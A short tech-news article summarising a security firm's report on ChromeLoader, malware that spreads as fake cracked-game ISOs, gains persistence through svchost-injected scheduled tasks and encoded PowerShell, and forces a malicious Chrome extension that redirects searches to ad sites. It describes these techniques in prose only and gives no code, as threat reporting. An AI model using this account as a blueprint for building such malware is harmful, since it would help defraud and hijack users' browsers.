Windows malware injects malicious extensions into Chrome via PowerShell
3 min readWindows malware injects malicious extensions into Chrome via PowerShell
- Huawei Mate 60 Pro Makes Satellite Calls: Only US$0.18/minute
- Huawei Mate60 Pro: First Smart Phone Supports Satellite Calls
- 14000 cores + 450W: RTX 4080 graphics card perfectly replaces the RTX 3080
- Big upgrade: The difference between Bluetooth 5.0 and 5.2
- Geeks Disappointed that RTX 4080/4090 doesn’t come with PCIe 5.0
- What are advantages and disadvantages of different load balancing?
Windows malware injects malicious extensions into Chrome via PowerShell.
According to news from The register , a Windows malware called ChromeLoader has recently appeared on the Internet, which uses PowerShell to add malicious extensions to the victim’s Chrome browser.
This malicious Chrome extension forcibly redirects users with online advertisements to generate revenue for the bad guys.
There is also a macOS variant of the malware that uses Bash to achieve the same goal, targeting Safari. Aedan Russell, an engineer at security firm Red Canary , detailed the malware in a blog post .
ChromeLoader is distributed as an ISO file that looks like a torrent file or a cracked video game.
According to Red Canary, it spreads online through websites and social media such as Twitter, via links or QR codes.
Once downloaded and executed, the .ISO file is extracted and installed as a driver on the victim’s machine, thereby gaining initial access to the system.
This ISO has an executable for installing ChromeLoader, and what appears to be a .NET wrapper for the Windows Task Scheduler.
This allows ChromeLoader to remain camouflaged after a breach, maintaining its persistence on the victim machine.
ChromeLoader uses scheduled tasks, but not the Windows native task scheduler (schtasks.exe) to do so.
Instead, it injects the service host (svchost.exe) across processes and creates its scheduled task scheduler.
After the cross-process injection is completed, the ChromeLoader’s scheduled task is executed through svchost, which invokes the command interpreter (cmd.exe), which executes a Base64-encoded PowerShell command containing multiple declared variables.
ChromeLoader then starts using PowerShell commands to check if the ChromeLoader malicious extension is installed, and if the path is not found, it uses wget to remotely pull the file and load the content as a Chrome extension.
When the ChromeLoader malicious extension is installed into Chrome, it can perform its real goal: forcibly modify the victim’s search results, redirecting them to malicious advertising sites.
ChromeLoader also redirects when the user tries to delete the extension, forcing the user to leave the Chrome extension page.
Additionally, PowerShell is always the preferred command execution method for malware due to its ability as a command and script interpreter.
Aedan Russell said: “This is a new way to load malicious extensions into Chrome, and other than ChromeLoader, no other known threat actors are trying to use this PowerShell technique to load malicious browser extensions “
“However, this technique is well-documented, and it’s often used by developers .”
- DIY a PBX (Phone System) on Raspberry Pi
- How to host multiple websites on Raspberry Pi 3/4?
- A Free Intercom/Paging system with Raspberry pi and old Android phones
- DIY project: How to use Raspberry Pi to build DNS server?
- Raspberry Pi project : How to use Raspberry Pi to build git server?
